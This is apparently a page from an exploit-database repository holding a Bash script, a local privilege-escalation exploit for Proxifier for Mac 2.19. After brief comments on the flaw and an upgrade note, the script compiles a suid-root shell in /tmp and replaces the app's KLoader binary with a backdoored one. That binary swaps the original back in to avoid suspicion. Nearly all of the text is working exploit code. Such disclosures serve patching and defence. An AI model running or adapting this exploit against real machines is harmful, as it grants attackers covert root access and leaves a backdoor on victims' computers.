08d2346400
13 changes to exploits/shellcodes Arq 5.9.7 - Local Privilege Escalation Murus 1.4.11 - Local Privilege Escalation Arq 5.9.6 - Local Privilege Escalation Hashicorp vagrant-vmware-fusion 5.0.3 - Local Privilege Escalation Hashicorp vagrant-vmware-fusion 5.0.1 - Local Privilege Escalation Sera 1.2 - Local Privilege Escalation / Password Disclosure Hashicorp vagrant-vmware-fusion 5.0.0 - Local Privilege Escalation Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation Proxifier for Mac 2.19 - Local Privilege Escalation FS Makemytrip Clone - 'id' SQL Injection WinduCMS 3.1 - Local File Disclosure FS Shaadi Clone - 'token' SQL Injection
87 lines
No EOL
3 KiB
Bash
Executable file
87 lines
No EOL
3 KiB
Bash
Executable file
# With CVE-2017-7643 I disclosed a command injection vulnerablity in the KLoader
|
|
# binary that ships with Proxifier <= 2.18.
|
|
#
|
|
# Unfortunately 2.19 is also vulnerable to a slightly different attack that
|
|
# yields the same result.
|
|
#
|
|
# When Proxifier is first run, if the KLoader binary is not suid root it gets
|
|
# executed as root by Proxifier.app (the user is prompted to enter an admin
|
|
# password). The KLoader binary will then make itself suid root so that it
|
|
# doesn't need to prompt the user again.
|
|
#
|
|
# The Proxifier developers added parameter sanitisation and kext signature
|
|
# verification to the KLoader binary as a fix for CVE-2017-7643 but Proxifier.app
|
|
# does no verification of the KLoader binary that gets executed as root.
|
|
#
|
|
# The directory KLoader sits in is not root-owned so we can replace it with
|
|
# our own binary that will get executed as root when Proxifier starts.
|
|
#
|
|
# To avoid raising any suspicion, as soon we get executed as root we can swap
|
|
# the real KLoader binary back into place and forward the execution call on
|
|
# to it. It does require the user to re-enter their credentials the next time
|
|
# Proxifier is run but it's likely most users wouldn't think anything of this.
|
|
#
|
|
# Users should upgrade to version 2.19.2.
|
|
#
|
|
# https://m4.rkw.io/proxifier_privesc_219.sh.txt
|
|
# 3e30f1c7ea213e0ae1f4046e1209124ee79a5bec479fa23d0b2143f9725547ac
|
|
# -------------------------------------------------------------------
|
|
|
|
#!/bin/bash
|
|
|
|
#####################################################################
|
|
# Local root exploit for vulnerable KLoader binary distributed with #
|
|
# Proxifier for Mac v2.19 #
|
|
#####################################################################
|
|
# by m4rkw, shouts to #coolkids :P #
|
|
#####################################################################
|
|
|
|
cat > a.c <<EOF
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
|
|
int main()
|
|
{
|
|
setuid(0);
|
|
seteuid(0);
|
|
|
|
execl("/bin/bash", "bash", NULL);
|
|
return 0;
|
|
}
|
|
EOF
|
|
|
|
gcc -o /tmp/a a.c
|
|
|
|
cat > a.c <<EOF
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
#include <sys/types.h>
|
|
#include <sys/stat.h>
|
|
|
|
int main(int ac, char *av[])
|
|
{
|
|
if (geteuid() != 0) {
|
|
printf("KLoader: UID not set to 0\n");
|
|
return 104;
|
|
} else {
|
|
seteuid(0);
|
|
setuid(0);
|
|
|
|
chown("/tmp/a", 0, 0);
|
|
chmod("/tmp/a", strtol("4755", 0, 8));
|
|
rename("/Applications/Proxifier.app/Contents/KLoader2", "/Applications/Proxifier.app/Contents/KLoader");
|
|
chown("/Applications/Proxifier.app/Contents/KLoader", 0, 0);
|
|
chmod("/Applications/Proxifier.app/Contents/KLoader", strtol("4755", 0, 8));
|
|
execv("/Applications/Proxifier.app/Contents/KLoader", av);
|
|
|
|
return 0;
|
|
}
|
|
}
|
|
EOF
|
|
|
|
mv -f /Applications/Proxifier.app/Contents/KLoader /Applications/Proxifier.app/Contents/KLoader2
|
|
gcc -o /Applications/Proxifier.app/Contents/KLoader a.c
|
|
rm -f a.c
|
|
|
|
echo "Backdoored KLoader installed, the next time Proxifier starts /tmp/a will become suid root." |